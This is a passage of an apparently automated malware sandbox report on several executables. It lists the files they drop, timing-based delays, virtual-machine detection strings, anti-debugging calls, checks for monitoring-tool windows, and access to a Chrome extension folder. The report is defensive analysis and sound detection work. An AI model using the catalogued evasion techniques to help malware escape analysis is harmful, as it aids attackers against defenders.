                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027024001\am.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\av3EZhq[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027060001\av3EZhq.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1026850001\rsn.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe TID: 7424Thread sleep time: -210000s >= -30000sJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7816Thread sleep count: 40 > 30
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7816Thread sleep time: -80040s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2944Thread sleep count: 34 > 30
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2944Thread sleep time: -68034s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8164Thread sleep count: 129 > 30
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8164Thread sleep time: -3870000s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8184Thread sleep count: 38 > 30
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8184Thread sleep time: -76038s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8180Thread sleep time: -48024s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8176Thread sleep time: -58029s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8164Thread sleep time: -30000s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -14757395258967632s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -100000s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -99865s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -99750s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -99599s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -99473s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -99312s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -99156s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -99026s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -98921s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -98799s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -98687s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -98578s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -98468s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -98359s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -97979s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -97769s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -97640s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -97531s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -97422s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -97312s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -97203s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -97093s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -96978s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -96841s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -96729s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -96620s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -96487s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 7652Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep count: 7735 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6708Thread sleep time: -7378697629483816s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1312Thread sleep count: 1898 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1596Thread sleep count: 2803 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5344Thread sleep count: 322 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7588Thread sleep time: -1844674407370954s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7572Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3408Thread sleep count: 2889 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2252Thread sleep count: 964 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6128Thread sleep time: -2767011611056431s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7492Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5720Thread sleep time: -21213755684765971s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6992Thread sleep time: -8301034833169293s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6352Thread sleep count: 8157 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6444Thread sleep time: -6456360425798339s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6248Thread sleep count: 639 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6408Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep count: 3640 > 30
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep count: 971 > 30
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6052Thread sleep count: 4065 > 30
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6052Thread sleep count: 192 > 30
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -2767011611056431s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2088Thread sleep time: -5534023222112862s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exe TID: 6688Thread sleep count: 194 > 30
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exe TID: 1816Thread sleep time: -30000s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5856Thread sleep count: 1474 > 30
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1704Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3992Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4556Thread sleep count: 3016 > 30
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep count: 1143 > 30
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5196Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4176Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3484Thread sleep count: 6514 > 30
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6184Thread sleep time: -5534023222112862s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3484Thread sleep count: 1212 > 30
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C46EBF0 PR_GetNumberOfProcessors,GetSystemInfo,2_2_6C46EBF0
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 100000
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 99865
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 99750
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 99599
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 99473
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 99312
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 99156
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 99026
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 98921
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 98799
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 98687
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 98578
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 98468
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 98359
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 97979
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 97769
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 97640
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 97531
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 97422
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 97312
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 97203
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 97093
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 96978
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 96841
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 96729
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 96620
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 96487
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                                      Source: skotes.exe, skotes.exe, 00000007.00000002.2049287825.000000000119C000.00000040.00000001.01000000.0000000A.sdmp, GIIIIJDHJE.exe, 0000000D.00000002.2287860490.000000000097C000.00000040.00000001.01000000.0000000F.sdmp, skotes.exe, 0000000E.00000002.2330367561.000000000119C000.00000040.00000001.01000000.0000000A.sdmp, iSHmPkn.exe, 00000010.00000002.2504764685.0000000000874000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWU
                                      Source: GIIIIJDHJE.exe, 0000000D.00000002.2290971116.00000000010D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareU
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F53000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                                      Source: mshta.exe, 00000026.00000002.2634457581.00000282BDA1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273928950.0000000000B08000.00000040.00000001.01000000.00000006.sdmp, 31FYMQUCQX14ZVCZU2HAYNV7V.exe, 00000005.00000002.2006226449.000000000067C000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.2049537334.000000000119C000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000007.00000002.2049287825.000000000119C000.00000040.00000001.01000000.0000000A.sdmp, GIIIIJDHJE.exe, 0000000D.00000002.2287860490.000000000097C000.00000040.00000001.01000000.0000000F.sdmp, skotes.exe, 0000000E.00000002.2330367561.000000000119C000.00000040.00000001.01000000.0000000A.sdmp, iSHmPkn.exe, 00000010.00000002.2504764685.0000000000874000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                      Source: iSHmPkn.exe, 00000010.00000002.2512245788.000000000B7C5000.00000004.00000020.00020000.00000000.sdmp, eXbhgU9.exe, 00000011.00000002.2746906922.0000000000F8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                      Source: eXbhgU9.exe, 00000011.00000002.2795889667.0000000006800000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}R
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSystem information queried: ModuleInformationJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeProcess information queried: ProcessInformationJump to behavior

                                      Anti Debugging

                                      barindex
                                      Hides threads from debuggers
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeThread information set: HideFromDebuggerJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeThread information set: HideFromDebuggerJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeThread information set: HideFromDebuggerJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeThread information set: HideFromDebuggerJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeThread information set: HideFromDebugger
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeThread information set: HideFromDebugger
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeThread information set: HideFromDebugger
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeThread information set: HideFromDebugger
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeThread information set: HideFromDebugger
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeThread information set: HideFromDebugger
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeThread information set: HideFromDebugger
                                      Tries to detect sandboxes and other dynamic analysis tools (window names)
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeOpen window title or class name: regmonclass
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeOpen window title or class name: gbdyllo
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeOpen window title or class name: procmon_window_class
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeOpen window title or class name: ollydbg
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeOpen window title or class name: filemonclass
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: NTICE
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: SICE
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: SIWVID
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
